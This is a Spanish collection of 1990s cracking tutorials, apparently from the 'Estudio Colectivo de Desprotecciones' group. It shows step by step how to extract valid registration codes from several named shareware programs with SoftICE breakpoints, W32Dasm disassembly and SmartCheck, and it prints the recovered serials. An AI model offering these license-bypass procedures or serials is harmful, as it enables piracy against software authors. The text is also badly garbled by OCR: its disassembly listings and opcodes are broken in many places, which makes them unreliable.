Apareceremos en la linea en la que pusimos el BreakPoint. 

Justo antes de esta llamada se suben a la pila el registro ECX y EDX. 
Si miramos el contenido de ambos registros, podremos ver nuestro 
codigo de registro y el real: 


d ECX=30071996 
d EDX=FGIB 


Ahora ya podemos quitar el BreakPoint con be * y pulsar la tecla F5 
para volver al programa y registrarlo con el codigo real. 
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J ava Script It ! y 1.3 


| Programa 


Descripción Programa para hacer applets java facilmente. 
Tipo Serial 


| W9S / W98 / NT 


| Url Inttp://www.computan.on.ca/ -todd/JavaScripit! 


Protección ¡Limitacion del numero de ejecuciones a 15 veces. 


| Dificultad [1) Principiante, 2) Amateur, 3) Aficionado, 4) Profesional, 5) Especialista. 
| Herramientas [Numega Smartcheck 6.0, Soft-lce (opcional). 
Objetivo [Obtemerun serial Correcta. 


| Fecha [7 de Enero de 1999 


Introducción 


Pues otro programilla hesho en Visual Basic 5, parece que crecen como enanos estos programas 
hecho en dicho lenguaje, y como el autor no haya hecho una release, la proteccion se las trae de 'difisil', 
asi que vamos a ver lo duro que es!!!. XD 


Al Atake 


Pues vamos al tajo, despues de observar el programa pues sin complicarnos mucho, probamos con el breakpoint que funciona en el 70% 
o mas, de los mensajes que sacan los programadores en visual basic diciendonos que no es correcto lo que hemos introducido, ese breakpoint 
es el rtemsgbox, pero en esta ocasion no nos es muy util ;( pero bueno, hay otras cositas como probar mas breakpoints (¡¡¡ que hay muchos sin 
explorar, por lo menos por mi parte !!!), pero en esta ocasion nos vamos directamente al Smartcheck, lo ejecutamos --> introducimos nuestros 
datos --> nos sale el mensaje de error y paramos el programa. Hechamos una visual (nunca mejor dicho) y nos encontramos con lo siguiente: 


Mid VARIANT:ByRef String: "sielesie...”, long:93, VARIANT:Integer:1) 
Mid VARIANT:ByRef String: "sielesie...”, long:3, VARIANT:Integer:1)] 
MidARIANT:ByRef String:"sielesie...'", long:9, VARIANT:Integer:1) 
Mid(VARIANT:ByRef String:"sielesie...”, long:9, VARIANT:Integer:1] 
Mid VARIANT:ByRef String: "sielesie...”, long:9, VARIANT:Integer:1] 
Mid VARIANT:ByRef String: "sielesie...”, long:9, VARIANT: Integer: 1) 
Mid VARIANT:ByRef String: "'sielesie...”, long:9, VARIANT: Integer: 1) 
MidARIANT:ByRef String:"sielesie...*, long:9, VARIANT:Integer:1) 
Mid VARIANT:ByRef String: "sielesie...”, long:9, VARIANT:Integer:1] 
Len(String:"sielesie...'"] retums LONG:9 
txtPassword. Text 
LCase(váRIA4NT:String:""27777""] 
Len'YARIANT:String:'15GjyjBR...'"] retums LONG:7795256 
$% MsgBox(VARIANT:String:"Registra...", Integer:48, VARIANT:Strina: "Error", VARIANT:Missina, VARIANT:Missing) retums Integer: 1 

£  cmdODk_Click 

2 cmdCancel_Click 
B fimiavaScriptlt_Unload 


$bbbbe.oCLEOLCECS.S 
Lo Le Le Le Le Le L £ £ % 


te A 


+ + 


Vemos claramente, el password que he introducido "77777" y vemos 2 lineas mas abajo la instruccion msgbox del visual basic donde 
nos dice que no estamos registrado, PERO ¿que koño es la linea que hay entre media? ummm, vamos a ver, mas detenidamente: 


JSCRIPT.EXElN0O08573E [no debug info) 
[2- string (variant) 
[E- String .bstial = DOOS454EC 
="16OjybEijyjs" 


Que cadena mas rara, gusto antes del msgbox y despues de mi password, nuse, nuse, pero pa mi ke tiene una PINTA de ser el password 
correcto que te cagas. Asi que prueba a ver.... es esa, verdad? XD. ; 


Hasta la proxima, ...Un Saludo. 
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El objetivo sera intentar encontrar el numero de registro real del programa. 


Introducción 


VM 


Al Atake 


Nada mas arrancar el programa, nos sale una Nag-screen diciendonos el numero de 
veces que llevamos ejecutado el programa y la posibilidad de registrar el programa 
o continuar evaluandolo. 


Pulsar el boton de Register y se nos pedira el usuario y el numero de registro: 


Name: Mr.Grey 
Registration Code: 30071996 


Pulsar CTRL+D para entrar en el Softlce. 
En este caso con GetWindowTextA o GetDlgltemTextA, no funcionaria. 
Poner un BreakPoint. 


bpx HIMEMCPY 


Pulsar la tecla F5 para volver al programa y pulsar el boton de Register. 


Apareceremos en el Softlce donde quitaremos el BreakPoint con: 


bc * 


Aqui iremos pulsando la tecla F12 hasta que estemos en el codigo perteneciente al 
programa. 

Esto lo sabremos por que en la linea de abajo de la ventana de codigo pondra 
CYTxxxxx. 


Una vez alli, ir pulsando F10 hasta llegar a la linea :0043F9FB. 
Si alguien quiere mirar como se calcula el numero, que entre en la llamada a 
0041D0B4 que hay en esta linea. 


Pulsar F10 y F10 para situarnos en la linea :0043FA04. 


Llegados a este punto, si miramos el contenido del registro EDX y EAX, podemos 
ver el numero real y el nuestro: 


d EDX=q8v9hqw <-- Numero real 
d EAX=30071996 <-- Nuestro numero 


Ahora ya podemos salir del Softlce pulsando F5. 


Una vez en el programa, escribir el codigo real y ya esta registrado. 


ESTUDIO COLECTIVO DE DESPROTECCIONES 


o 


Whiskey Kon Tekila Whiskey Kon Tekila 


progrAmA AddSoft 2.26 W95 
O 
url Intup//www.eyberspaceq add 
| protECCión [90 dias de evaluacion pero pasado este tiempo, sigue funcionando y Nag-Sereen 
| hErrAmiEntAs — [Softlce 3.24, W32Dasm 8.93 
CrACkEr Mr.Grey 


lo FECHA Dime de LB de 1998 
Como a para desarrolladores de Shareware que permite subir los programas a mas 
de 100 sitios a la vez 


VM 


Introducción 


El objetivo sera intentar encontrar el numero de registro real del programa. 


Win 


Al Atake 


Para buscar el numero de serie, usaremos el W32Dasm ya que si intentamos usar el 
Softlce con un BreakPoint en GetWindowTextA o GetDlgltemTextA, no 
funcionaria. 

Podriamos usar HMEMCPY, pero en este caso no lo usaremos. 


Arrancar el W32Dasm y abrir una copia del fichero Addsoft.exe. 
Una vez desensamblado, salvar el proyecto para no tener que volver a 
desensamblarlo. 


Abrir la ventana de String Data References y buscar el texto "Thanks for 
registering! :)". 

Hacer doble click sobre el texto y nos posicionaremos en la linea donde aparece. 
Cerrar la ventana de String Data References. 


En pantalla tendremos el siguiente codigo: 


:00480AF1 E8DE49FFFF call 004754D4 

:00480AF6 8BD8 mov ebx, eax 

:00480AF8 A12C644A00 mov eax, dword ptr [004A642C] 
:00480AFD 8B00 mov eax, dword ptr [eax] 

:00480AFF 889884070000 mov byte ptr [eax+00000784], bl 
:00480B05 A12C644A00 mov eax, dword ptr [004A642C] 
:00480B0A 84DB test bl, bl 

:00480B0C 740A Je 00480B18 


* Possible StringData Ref from Code Obj ->"Thanks for 
registering! :)" 

:00480B0E B8580B4800 mov eax, 00480B58 

:00480B13 E808CEFBFF call 0043D920 


* Referenced by a (U)nconditional or (C)onditional Jump 
at Addresses: 

| :00480A8D(C), :00480AAE (C), :00480B0C(C) 

| 

:00480B18 33C0 xor eax, eax 

:00480B1A 5A pop edx 

:00480B1B 59 pop ecx 

:00480B1C 59 pop ecx 

:00480B1D 648910 mov dword ptr fs: l[eax], edx 


Como se puede ver, en la linea :00480B0C hay un salto condicional en el cual se 
hace un TEST de BL, si es 0, se salta el mensaje de registro que es lo que 
intentamos evitar. 

Si miramos unas lineas hacia arriba, en la :00480AF1 hay una llamada a 
004754D4, la cual devuelve en EAX el valor que luego se mira en BL ya que si 
vemos en la siguiente linea a la llamada, se mueve EAX sobre EBX. 

Vallamos a la llamada a 004754D4: 


* Referenced by a CALL at Addresses: 


|:00480AF1 , :0049DD19 


:004754D4 
:004754D5 
:004754D7 
:004754D9 
:004754DB 
:004754DD 


* Referenced by a 


55 push ebp 
8BEC mov ebp, es 
6A00 push 000000 
6A00 push 000000 
6A00 push 000000 
53 push ebx 


at Address: 
| :00475477(C) 


:004754DE 


* Referenced by a 


56 push esi 


at Address: 
| :0047548A(C) 


:004754DF 
:004754E1l 
:004754E3 
:004754E4 
:004754E9 
:004754EC 


* Referenced by a 


8BF0O mov esi, 
33C0 xor eax, 
55 push ebp 

6879554700 push 


Pp 
00 


00 
00 


(U)nconditional or 


(U)nconditional or 


eax 
eax 


00475579 


(C)onditional Jump 


(C)onditional Jump 


64FF30 push dword ptr fs: [eax] 


648920 mov dword ptr fs: leax], 


at Address: 
| :00475479(C) 


:004754EF 
:004754F1 
:004754F4 
:004754F6 
:004754EFB 
:004754FE 


* Referenced by a 


33DB xor ebx, eb 
8D55FC lea edx, 
8BC6 mov eax, es 
ES5DEFDFFFF call 
8B45FC mov eax, 
ESE5DE7F8FF call 


at Address: 
| :0047548D(C) 


:00475503 
:00475505 
:00475507 
:0047550A 
:0047550€C 
:00475511 
:00475514 
:00475519 
:0047551B 
:0047551D 
:00475520 


85C0 test eax, e 
7457 je 0047555E 
8D55F8 lea edx, 
8BC6 mov eax, es 
ESOFFEFFFF call 
8B45F8 mov eax, 
ESCFE7F8FF call 
85C0 test eax, e 
7441 je 0047555E 
8D4DF4 lea ecx, 
BACE070000 mov e 


(U)nconditional or 


x 
dword ptr 
i 
00475258 
dword ptr 
00403CE8 


(U)nconditional or 


ax 


dword ptr 
L 
00475320 
dword ptr 
00403CE8 
ax 


dword ptr 
dx, 


esp 


(C)onditional Jump 


[ebp-04] 


[ebp-04] 


(C)onditional Jump 


[ebp-08] 


[ebp-08] 


[ebp-0C] 


000007CE 


:00475525 8B45FC mov eax, dword ptr [ebp-04] 
:00475528 E8D3C9FFFF call 00471F00 

:0047552D 8B45F4 mov eax, dword ptr [ebp-0C] 
:00475530 8B55F8 mov edx, dword ptr [ebp-08] 
:00475533 E8COE8F8FF call 00403DF8 

:00475538 7504 jne 0047553E 

:0047553A B301 mov bl, 01 

:0047553C EBO2 jmp 00475540 


En la linea :004754FE hay una llamada que devuelve la longitud del ID que se 
introdujo seguida de una comprobacion para ver si se dejo vacio. 

Siguiendo el flujo, en la linea :00475514 hay otra llamada que devuelve la longitud 
del numero de registro que se introdujo seguida de una comprobacion para ver si se 
dejo vacio. 

La siguiente llamada que tenemos, se encuentra en la linea :00475528 que es la 
que calcula el numero de registro real. 


Arranquemos ahora el Symbol Loader del Softlce y cargemos el modulo 
Addsoft.exe. 
Pondremos un BreakPoint en la linea :00475528 asi: 


bpx 00475528 


y pulsaremos F5 para que continue la carga del programa. 


Nos aparecera la Nag-Screen para que pongamos la informacion de registro: 


Enter Registration ID: Mr.Grey 
Enter Registration Number: 30071996 


y pulsaremos el boton Continue. 


Apareceremos en el Softlce, en la linea en la que pusimos el BreakPoint. 

Aqui podemos pulsar la tecla F8 para entrar en la rutina del calculo del numero 
real o pulsar la tecla F10 para pasar a la siguiente linea. 

En este caso, pulsaremos F10 aunque si alguien quiere ver como se calcula el 
numero real, tiene que pulsar F8. 

Pulsar otra vez F10 y F10 para situarnos en la linea :00475533. 


Llegados a este punto, si miramos el contenido del registro EAX y EDX, podemos 
ver el numero real y el nuestro: 


d EAX=051062985 <-- Numero real 
d EDX=30071996 <-- Nuestro numero 


Ahora ya podemos desactivar el BreakPoint que teniamos entrando en el Softlce y 
escribiendo: 


BC* 


y pulsar F5 para volver al programa. Una vez en el programa, escribir el codigo 
real y ya esta registrado. 
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Introducción 


El objetivo sera intentar encontrar el numero de registro real del 
programa. 


Al Atake 


Cuando arrancamos el programa, sale directamente la Nag-Screen, 
avisandonos de que el programa es shareware y de que nos debemos 
de registrar. 

Tendremos dos posibilidades, una es el boton Register o el boton OK. 


Pulsaremos el boton Register y nos saldra una pantalla pidiendonos el 
nombre de usuario y la clave. 


Registration Name: Mr.Grey 
Registration Key: 30071996 


Antes de pulsar el boton OK, pondremos 2 BreakPoints en el Softlce. 
Para ello, pulsar CTRL+D y escribir lo siguiente: 


bpx GetWindowTextA 
bpx GetDlgltemTextA 


Pulsar la tecla F5 para volver al programa y pulsar el boton OK. 
Veremos que no sale el Softlce y que en cambio, sale otra ventana con 
el mensage de Sorry not a correct reg key. 

Esto quiere decir que la forma de seguimiento no va por los conductos 
mas normales. 

Pulsar otra vez CTRL+D para quitar los BreakPoints anteriores 
escribiendo be * y despues la tecla F5. 


En lugar de usar el Softlce directamente, pasaremos a traves del 
WDasm. 

Arrancar el WDasm y abrir una copia del fichero Uninsman.exe. 

Una vez que tengamos el programa desensamblado, salvar el proyecto 
para no tener que desensamblarlo otra vez. 


Ahora seleccionaremos el menu Refs / String Data References que 
nos mostrara todas las cadenas de caracteres que el WDasm considere 
como tales. 

Aqui intentaremos buscar el mensaje que nos salio cuando intentamos 
registrar el programa, pero .... resulta que no esta este mensaje y no 
tenemos mas pistas que seguir. 


En estos casos, una de las cosas que se pueden hacer, es buscar 
cualquier tipo de referencia o cadena de caracteres que nos den una 


pista sobre que el programa es shareware, que no esta registrado, que 
es de evaluacion o algo fuera de lo que se pudiera considerar normal. 


En el caso de este programa, hay una referencia que salta a la vista que 
no es muy normal, esta es SILICON SURFER [PC] ya que no es un 
texto muy normal y ademas esta en mayusculas, mas bien parece un 
nombre de algun grupo. 


Si pulsamos un doble click, saltaremos directamente a la siguiente 
linea en donde se encuentra este texto: 


* Referenced by a (U)nconditional or 
(C)onditional Jump at Address: 
| :O0045BFAE (C) 


:0045BFC2 8D55F4 lea edx, dword ptr [ebp-0C] 
:0045BFC5 8B45FC mov eax, dword ptr [ebp-04] 
:0045BFC8 8B800C020000 mov eax, dword ptr 
[eax+0000020C] 

:O0045BFCE E8B539FCFF call 0041F988 

:0045BFD3 8B45F4 mov eax, dword ptr [ebp-0C] 
:0045BFD6 8D55EC lea edx, dword ptr [ebp-14] 
:0045BFD9 EBS9ABOFAFF call 00407078 

:0045BFDE 8B45EC mov eax, dword ptr [ebp-14] 


* Possible StringData Ref 
>"SILICON SURFER [PC]" 


:0045BFE1 BAAOC34500 mov edx, 
Aparecemos aqui 


from Code Obj -— 


0045C3A0 <-- 


:0045BFE6 E8S297EFAFF call 00403E14 
:0045BFEB 753D jne 0045C02A 

:0045BFED 6A00 push 00000000 

:0045BFEF B8B9000000 mov eax, 000000B9 
:0045BFF4 E877100000 call 0045D070 
:0045BFF9 50 push eax 

:0045BFFA B828000000 mov eax, 00000028 
:0045BFFF E890100000 call 0045D094 
:0045C004 50 push eax 

:0045C005 668B0DB4C34500 mov CXx, word ptr 
[0045C3B4] 

:0045C00C 33D2 xor edx, edx 


Vamos a hacer una prueba, ejecutar otra vez el programa e ira 


registrarlo con el nombre anterior. 

Resulta que nos sale una ventana con el mensaje This registration 
info is illegal. No need to pirate this software. It is just 10$ to 
register. 

Por lo visto, este grupo debio de haberles crakeado alguna version 
anterior o algo asi y han metido este control. 


Volvamos al WDasm e intentemos buscar el texto pirate a ver que 
sale, ir al menu Search / Find Text y escribirlo. 

Resulta que si que hay un texto con esta palabra y resulta que es el 
mensaje que nos habia salido: 


* Possible StringData Ref from Code Ob3j ->"This 
registration info is illegal. " 


is Just 10$ to register" 

| 

:0045C00E B8C0C34500 mov eax, 0045C3C0 <-—— 
Aparecemos casi aqui :) 

:0045C013 E87000FEFF call 0043C088 

:0045C018 8B45FC mov eax, dword ptr [ebp-04] 
:0045C01B C7805001000002000000 mov dword ptr 
[ebx+00000150], 00000002 

:0045C025 E93A030000 3jmp 0045C364 


Si os fijais y subis unas lineas hacia arriba, vereis el texto que hace 
referencia al grupo justamente en la linea :0045BFE1 y en la siguiente 
linea una llamada a 00403E14 y que a su vuelta hace un salto 
condicional si no es igual. 

Esto quiere decir que si el nombre introducido no es igual al del grupo, 
que salte a 0045C02A: 


* Referenced by a (U)nconditional or 
(C)onditional Jump at Address: 

| :0045BFEB(C) 

| 

:0045C02A 8B45FC mov eax, dword ptr [ebp-04] <-- 
Aparecemos aqui 

:0045C02D EB8SE6F8FFFF call 0045B918 <-—— 
Comprobacion numero registro 

:0045C032 3C01 cmp al, 01 <-—— AL es igual a 1 ? 
:0045C034 0F8551020000 ¿jne 0045C28B <-- Si AL 


no es 1, malo 
:0045C03A B201 mov dl, 01 <--— Bien, bravo... 
registrado 


Aqui podemos ver que hace una llamada a 0045B918 y a la vuelta, 
compara el contenido del registro AL con el valor 1 y si el resultado 
no es igual, salta a 0045C28B que es la rutina de error. 

Veamos el codigo de la llamada a 0045B918: 


* Referenced by a CALL at Address: 

| :0045C02D 

| 

:0045B918 55 push ebp 

:0045B919 8BEC mov ebp, esp 

:0045B91B 33C9 xor ecx, ecx 

:0045B91D 51 push ecx 

:0045B936 8D55F4 lea edx, dword ptr [ebp-0C] 
:0045B939 8B860C020000 mov eax, dword ptr 
[esi+0000020C] 

:0045B93F E84440FCFF call 0041F988 

:0045B944 837DF400 cmp dword ptr [ebp-0C], 
00000000 

:0045B948 747E je 0045B9C8 

:0045B96D 8B55F0 mov edx, dword ptr [ebp-10] 
:0045B970 8D45FC lea eax, dword ptr [ebp-04] 
:0045B973 E8A881FAFF call 00403B20 

:0045B978 33DB xor ebx, ebx 

:0045B97A 85FF test edi, edi 

:0045B97C 7E20 jle 0045B99E 


Vemos que en la linea :0045B944 hace una comprobacion de si el 
nombre introducido esta vacio o no y en la linea :0045B97A hace otra 
comprobacion. 

El codigo que nos interesa, es el que viene a continuacion: 


* Referenced by a (U)nconditional or 
(C)onditional Jump at Address: 

| :0045B99C(C) 

:0045B983 8B55FC mov edx, dword ptr [ebp-04] 
:0045B986 8A5402FF mov dl, byte ptr [|edx+teax- 


01] 

:0045B98A 80FA20 cmp dl, 20 

:0045B98D 740B Je 0045B99A 

:0045B98F 8B4DFC mov ecx, dword ptr [ebp-04] 
:0045B992 81E2FF000000 and edx, 000000FF 
:0045B998 0O3DA add ebx, edx 


* Referenced by a (U)nconditional or 
(C)onditional Jump at Address: 

| :0045B98D(C) 

| 

:0045B99A 40 inc eax 

:0045B99B 4F dec edi 

:0045B99C 75E5 jne 0045B983 


* Referenced by a (U)nconditional or 
(C)onditional Jump at Address: 

| :0045B97C(C) 

| 

:0045B99E 81F389000000 xor ebx, 00000089 
:0045B9A4 83F333 xor ebx, 00000033 

:0045B9A7 43 inc ebx 

:0045B9A8 8D55F8 lea edx, dword ptr [ebp-08] 
:0045B9AB 8B8610020000 mov eax, dword ptr 
[esi+00000210] 

:0045B9B1 E8D23FFCFF call 0041F988 

:0045B9B6 8B45F8 mov eax, dword ptr [ebp-08] 
:0045B9B9 E876BAFAFF call 00407434 

:0045B9BE 3BD8 cmp ebx, eax 

:0045B9C0 7504 3jne 0045B9C6 

:0045B9C2 B301 mov bl, 01 

:0045B9C4 EBO2 Jjmp 0045B9C8 


Desde la linea :0045B983 y hasta la linea :0045B99C, lo que hace es 
un bucle en el que monta la primera parte del numero de registro. 
Cuando a terminado de recorrer todo el nombre, sigue en la linea 
:0045B99E y hace un par de XOR al contenido del registro EBX y lo 
incrementa en 1. 


Si miramos unas lineas mas abajo, vemos que hay una comparacion 
entre EBX y EAX que es evaluada en la siguiente linea haciendo un 
salto a 0045B9C6 en caso de que no sean iguales. 

Si son iguales, mueve un 1 a BL. 


Llegados a este punto, vamos a usar el Symbol Loader del Softlce y 
elegiremos el menu File / Open Module, cogeremos el fichero 
uninsman.exe. 

Elegir el menu Module / Load y poner un BreakPoint en la linea 
:0045B9BE y pulsar la tecla FS para que se ejecute el programa. 


Nos aparecera la Nag-Screen y pulsaremos el boton de Register e 
introducir el nombre y clave que se pusieron la vez anterior y pulsar el 
boton de OK. 

Automaticamente, aparecera la pantalla del Softlce, justo en la linea 
donde pusimos el BreakPoint, o sea, en la linea del CMP EBX, EAX. 
Si evaluamos el contenido de ambos registros, veremos lo siguiente: 


? EBX = 597 <-- Numero real 
2 EAX = 30071996 <-- Nuestro numero 


Ahora ya sabemos el numero de registro real, solo queda desactivar el 
BreakPoint que pusimos: 


bd 00 


Pulsar ES para volver al programa que nos saldra una ventana diciendo 
que el numero es erroneo. 

Volver a pedir el registro y poner el numero real y el programa ya esta 
registrado. 
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Introducción 


El objetivo sera intentar encontrar el numero de registro real del 
programa. 


Al Atake 


Lo primero que haremos sera ejecutar el programa e intentar 
registrarnos. 


Para registrar el programa, pulsar el menu File / Registration donde se 
pedira: 


User Name: Mr.Grey 
User Key: 30071996 


El valor introducido, puede ser cualquiera. 
Pulsar CTRL+D para entrar en el Softlce y poner un BreakPoint: 


bpx GetDlgltemTextA 
Pulsar la tecla F5 para volver al programa y pulsar el boton OK. 


Saltaremos al Softlce y pulsaremos F5 y F11, esto hara que nos 
situemos en la siguiente linea en el programa que provoco el 
BreakPoint. 


Ahora deberemos estar situados en la linea :40F87E y ver el siguiente 
codigo: 


* Reference To: USER32.GetDlgltemTextA, 
Ord:00F5h 

| 

:0040F878 FF1538464200 Call dword ptr 
[00424638] 

:0040F87E 8D8424D4000000 lea eax, dword ptr 
[esp+000000D4] 

:0040F885 8D542454 lea edx, dword ptr [esp+54] 


* Referenced by a (U)nconditional or 
(C)onditional Jump at Address: 

| :0040F8A3 (C) 

| 

:0040F889 8A08 mov cl, byte ptr [eax] 
:0040F88B 3A0A cmp cl, byte ptr [edx] 
:0040F88D 751A 3jne 0040F8A9 


Pulsaremos F10 hasta llegar a la linea :40F889. 


En este punto, miramos el contenido del registro EAX y EDX, 
podremos ver el numero de registro real: 


d EAX <-- Nuestro real = v/INXTEwQLn 
d EDX <-- Nuestro numero = 30071996 


Ahora ya podemos desactivar el BreakPoint que teniamos, escribiendo: 


bd 00 


y pulsar F3 para volver al programa. 
Una vez en el programa, escribir el codigo real y ya esta registrado. 
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MA 


Introducción 


Al Atake 


Lo primero que haremos sera ejecutar el programa e intentar 
registrarnos. 


Para registrar el programa, pulsar el boton "I" y la opcion Enter 
Registration Key donde se pedira: 


Enter Your Name: Mr.Grey 
Enter Your Company: Jumanji 
Enter Registration Key: 3007199 


El campo Registration Key solo admite hasta 7 digitos. 
El valor introducido, puede ser cualquiera. 
Pulsar el boton OK. 


Nos saldra una ventana con un mensaje de error, '"WRONG Key has 
been entered...Cannot unlock 4Screens". 
Apuntar este mensaje. 


Arrancar el W32Dasm y desensamblar una copia del fichero 
4Screens.exe. 


Una vez terminado el proceso, salvar el proyecto para no tener que 
desensamblarlo otra vez. 


Pulsar el menu Refs / String Data References, aparecera una ventana 
con todos los strings que el W32Dasm considera como tales. Buscar el 
mensaje que nos aparecio al intentar registrar el programa. 


Una vez que lo hayamos localizado, pulsar un doble click sobre la 
linea y nos situaremos automaticamente en la linea que contiene dicho 
mensaje. 

Pulsar sobre el boton Close de la ventana SDR. 


Nos encontraremos en el siguiente punto: 


* Referenced by a (U)nconditional or 
(C)onditional Jump at Address: 
| :004013D5(C) 


:004014B4 6A00 push 00000000 


:004014B6 6A00 push 00000000 


* Possible StringData Ref from Data Ob)j -— 
>"WRONG Key has been entered...cannot " 


>"unlock 4Screens." 

:004014B8 682CF14200 push 0042F12C <-—— 
Aparecemos aqui 

:004014BD E81F930100 call 0041A7El 


Como podemos ver, aqui llegamos desde un salto condicional en la 
linea :004013D5. 
Vayamos hasta esta parte del codigo: 


* Referenced by a (U)nconditional or 
(C)onditional Jump at Address: 

| :004013AB(C) 

| 

:004013C3 33C0 xor eax, eax 

:004013C5 EBO5 jmp 004013CC <--— Salto 
incondicional 


* Referenced by a (U)nconditional or 
(C)onditional Jump at Addresses: 

| :004013A7(C), :004013B7(C) 
:004013C7 1BCO0O sbb eax, eax 
:004013C9 83D8FF sbb eax, FEFEFFFFEF 


* Referenced by a (U)nconditional or 
(C)onditional Jump at Address: 

| :004013C€5 (U) 

| 

:004013CC 33C9 xor ecx, ecx 

:004013CE 85C0 test eax, eax 

:004013D0 0F94C1 sete cl 

:004013D3 84C9 test cl, cl 

:004013D5 0F84D9000000 Je 004014B4 <-— Salto al 
mensaje de error 


Aqui podemos ver que hasta la linea :004013CC viene desde un salto 
incondicional situado en la linea :004013CS5 y a la linea :004013C3 


desde un salto condicional en la linea :004013AB. 
Esta parte del codigo es la que nos interesa: 


* Referenced by a (U)nconditional or 
(C)onditional Jump at Address: 

| :004013C1(C) 

| 

:0040139F 8A10 
es importante 
:004013A1 8A1lE 
es importante 
:004013A3 8ACA 
:004013A5 3AD3 
:004013A7 751E 
:004013A9 84C9 
:004013AB 7416 
condicional 
:004013AD 8A5001 mov dl, 


mov dl, byte ptr [eax] <-- Esto 


mov bl, byte ptr [esil] <-- Esto 


mov 
cmp 


cl, dl 

dl, bl 

jne 004013C”7 

test cl, cl 

je 004013C3 <-—- Salto 


byte ptr [eax+01] 


:004013B0 


:004013B3 
:004013B5 
:004013B7 
:004013B9 
:004013BC 
:004013BF 
:004013C1 


8g8A5E01 mov bl, 
gAcaA mov cl, dl 
3AD3 cmp dl, bl 
750E jne 004013C7 

83C002 add eax, 00000002 
83C602 add esi, 00000002 
84C9 test cl, cl 

75DC jne 0040139F 


byte ptr [esi+01] 


En la linea :0040139F, es donde empieza realmente la comprobacion 
del numero de registro, asi que pasaremos al Softlce y pondremos un 
BreakPoint en la linea :0040139F. 


Para ello, arrancaremos el Symbol Loader del Softlce y cargaremos el 
fichero 4Screens.exe mediante el menu File / Open Module, despues 
pulsaremos en el menu Module / Load. 


Apareceremos en la pantalla tipica del SoftlIce. 
Aqui pondremos el siguiente BreakPoint: 


bpx 0040139F 


Pulsar ES para volver al programa y pedir otra vez la opcion de 
registrar el programa. 
Entrar los campos y pulsar el boton OK. 


Saltaremos al Softlce, justo en la linea en la que pusimos el 
BreakPoint. 


En este punto, miramos el contenido del registro EAX y ESL 
podremos ver el numero de registro real: 


d EAX <-- Nuestro numero = 3007199 
d ESI <-- Numero real = 3370776 


Ahora ya podemos desactivar el BreakPoint que teniamos, escribiendo: 
bd 00 


y pulsar F3 para volver al programa. 
Una vez en el programa, escribir el codigo real y ya esta registrado. 


NOTA: Para este programa, da igual lo que se ponga en los campos 
del registro. 
Siempre es el mismo numero de registro. 
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Introducción 


El objetivo sera intentar encontrar el numero de registro real del programa. 


Win 


Al Atake 


Para registrar el programa, nada mas arrancarlo, se pulsara el boton de Agree and 
Register donde se pedira: 


Name: Mr.Grey 
Company: Jumanji 
Registration Key: 30071996 


El valor introducido, puede ser cualquiera. 
Pulsar Ctrl+D para entrar en el Softlce y poner un BreakPoint: 


bpx MessageBoxA 


Pulsar F5 para volver al programa y el boton OK. 
Saltaremos al Softlce y pulsaremos F11. 


Volveremos al programa automaticamente y nos saldra una ventana de error con el 
mensage "Invalid registration information!” indicandonos que la informacion de 
registro introducida es erronea. 

Pulsaremos el boton Aceptar y volveremos a aparecer en el Softlce en la linea 
:004026D7. 


Subreimos unas lineas en la pantalla de codigo, hasta la linea :004026A9 donde 
veremos el siguiente codigo: 


Liz 
:004026A9 8D45E8 LEA EAX, [EBP-18] Nuestro 
numero 
<-- Lo 
:004026AC 50 PUSH EAX sube al 
stack 
Son 
:004026AD 8D4580 LEA EAX, [EBP-80] Nuestra 
compañia 
<-- Lo 
:004026B0 50 PUSH EAX sube al 
stack 
Za 
:004026B1 8D8518FFFFFF LEA EAX, [EBP-00E8] Nuestro 
nombre 


<-- Lo 
004026B7 50 PUSH EAX sube al 
stack 
<i= 
Calculo 
numero 
real 


004026B8 E886000000 CALL 00402743 


004026BD 83C40C ADD ESP, 0C 


004026C0 85C0 TEST EAX, EAX 
<-- Salta 
004026C2 7D15 JGE  004026D9 si es 
correcto 
004026C4 6A30 PUSH 30 
004026C6 68048C4100 PUSH 00418C04 
004026CB 68E08B4100 PUSH 00418BE0 
004026D0 53 PUSH EBX 
<a. 
004026D1 FF1580244200 CALL [USER32!MessageBoxA] Mensaje 
de error 
004026D7 EB60 JMP 00402739 


Quitaremos el BreakPoint que teniamos puesto con 
bd 00 


y situaremos un nuevo BreakPoint en :004026A9. 
Pulsar FS para volver al programa y pedir la opcion de registrarlo. 


Cuando pulsemos el boton OK, saltaremos al Softlce en la linea :004026A9 que es 
el BreakPoint que pusimos. 
A partir de aqui, iremos pulsando F10 hasta llegar a la linea :004026C0. 


Por si a alguien le puede interesar, en la linea :004026B8, se calcula el numero real 
y se devuelve en: 


EAX =-1 
si el numero introducido es erroneo. 


En este punto (:004026C0), miramos el contenido del registro EDX y podremos 
ver el numero de registro real: 


d EDX <-- Numero de registro real = 241-012-244 
Ahora ya podemos desactivar el BreakPoint que teniamos, escribiendo: 
bd 00 


y pulsar F5 para volver al programa. 
Una vez en el programa, escribir el codigo real y ya esta registrado. 


ESTUDIO COLECTIVO DE DESPROTECCIONES 


Whiskey Kon Tekila 


Font Look 3.2 


progrAmAs Directory Printer 1.8 W95 
Super Text Search 1.6 


DEsCripCión Gestor de Fuentes de Letras ; Imprimir Directorios ; Buscar Textos. 
tipo Shareware (15 $ cada uno) 
protECCión Límite de 30 días de uso, con opción para registrarse. 


Introducción 


La versión de evaluación está limitada a 30 días, y tiene una opción para introducir 
el Código de Registro. 

El objetivo será conseguir el Código de Registro para cada uno de los tres 
programas. (la protección (entre comillas ;-) es la misma para los 3). 


Wen 


Al Atake 


Arrancar el Pc con el Softlce debidamente configurado. 
Ejecutar el programa, y seleccionar la opción "Enter Registration Code" 


Ir al Softlce (Ctrl+-D), poner un breakpoint para la api de windows MessageBoxA 
(BPX MessageBoxA), y volver al programa (Ctrl+D). 
Introducir cualquier número, y darle al OK. 


Aparecemos en el Softlce, y con un P RET (F12), nos situamos en el código del 
programa, después de la llamada a MessageBox. 

Si miramos unas línias más arriba, en busca de algún salto condicional, 
encontramos un par de instrucciones JNZ. 

En una de ellas, la instrucción precedente es un CALL. Ponemos un breakpoint 
allí, haciendo doble click en la instrucción del call. 


Ya se puede desactivar el BPX MessageBoxA (BD 0), y seguir la ejecución 
(Ctrl+D). 

Nos sale la ventanita de Código incorrecto, pero como ya tenemos los breakpoints 
colocados, volvemos a intentar el registro. 


Aparecemos en el Softlce, en la instrucción del CALL donde hemos puesto el 
breakpoint. 

Si miramos el contenido de EDX (D EDX), ya tendremos lo que queríamos ;-) 
Lo apuntamos en un papel, desactivamos todos los breakpoints (BD *), y 
continuamos con el programa(Ctrl+D). 


Volvemos a registrarnos, ponemos el código que hemos encontrado, y 
